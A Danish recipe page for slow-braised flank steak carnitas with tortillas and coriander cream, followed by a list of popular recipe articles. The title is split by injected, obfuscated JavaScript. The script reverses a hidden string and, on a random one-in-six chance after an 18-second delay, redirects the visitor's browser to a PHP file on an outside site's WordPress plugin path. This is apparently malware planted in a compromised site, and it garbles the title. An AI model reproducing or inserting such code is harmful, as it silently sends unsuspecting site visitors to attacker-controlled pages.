Langtidsbraiseret steak carnitas med tortillas og kori$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andercreme

Carnitas betyder ”småt kød” og dækker over, at dette kød bliver så mørt under langtidsbraiseringen, at kødet kan rives fra hinanden til små ultramøre stykker. Det er en yderst nem ret, som bare kræver lang tid.

Opskrift til 8 pers.

Rub:
2 tsk chilipulver
1 tsk spidskommen
1 tsk løgpulver
½ tsk hvidløgspulver
½ tsk cayennepeber
1 tsk salt
½ tsk sort peber 

1 kg flanksteak
1-2 løg, hakkede
1 ½ grøn peberfrugt, hakket
1 ½ rød peberfrugt, hakket
2 jalapenos eller en anden god chili, udkernede og hakkede

Koriandercreme:
1 ¾ dl cremefraiche
1 ¼ dl korianderblade
2 spsk olivenolie
2 spsk limesaft
Salt og peber

Ved servering:
Majs- eller hvedetortillas
Avocado, skåret i skiver
Koriander
Salsa*
Lime

Rub: Bland alle ingredienser sammen i en skål.
Fordel rubben på flanksteaken, så den er helt dækket. Læg flanksteaken i bunden af en gryde, og dæk med alle grøntsagerne. Stil gryden på blusset, læg låg på, og sæt det på helt lav varme, 1 eller 2, og lad det stå i 7-8 timer, til det er fuldstændig mørt.
Koriandercreme: Kom alle ingredienser i en blender, og blend til en creme. Smag til med salt og peber. Stil cremen på køl.
Ved servering: Varm tortillaerne på en pande over medium varme i ca. 30 sekunder på hver side. Brug en gaffel til at trække kødet fra hinanden, og fyld kødet på tortillaerne sammen med avocado, koriander, salsa, lidt limesaft og koriandercreme.

*Salsa kan købes i alle supermarkeder, men du kan med fordel bruge en god gang hjemmelavet salsa roja (find opskriften her på sitet).

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Pappadoms med yoghurtdip

Pappadoms er tynde og sprøde indiske brød lavet af linsemel, og ofte er de krydret med alverdens varmende krydderier. Det er muligt at lave pappadoms

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere